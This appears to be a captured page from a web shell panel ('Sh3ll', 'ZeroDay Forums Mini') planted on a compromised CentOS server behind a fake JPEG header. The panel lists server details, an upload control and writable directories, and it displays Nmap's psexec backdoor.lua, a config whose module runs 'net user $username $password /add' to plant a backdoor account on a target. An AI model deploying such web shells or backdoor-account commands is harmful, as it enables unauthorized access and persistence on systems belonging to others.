ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /usr/share/nmap/nselib/data/psexec/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/nmap/nselib/data/psexec/backdoor.lua
---This config file is designed for adding a backdoor to the system. It has a few
-- options by default, only one enabled by default. I suggest 
--
-- Note that none of these modules are included with Nmap by default. 

-- Any variable in the 'config' table in smb-psexec.nse can be overriden in the
-- 'overrides' table. Most of them are not really recommended, such as the host,
-- key, etc.
overrides = {}
--overrides.timeout = 40

modules = {}
local mod

-- TODO: allow the user to specify parameters
--Note: password can't be longer than 14-characters, otherwise the program pauses for
-- a response
mod = {}
mod.upload           = false
mod.name             = "Adding a user account: $username/$password" 
mod.program          = "net"
mod.args             = "user $username $password /add"
mod.maxtime          = 2
mod.noblank          = true
mod.req_args         = {'username','password'}
table.insert(modules, mod)


ZeroDay Forums Mini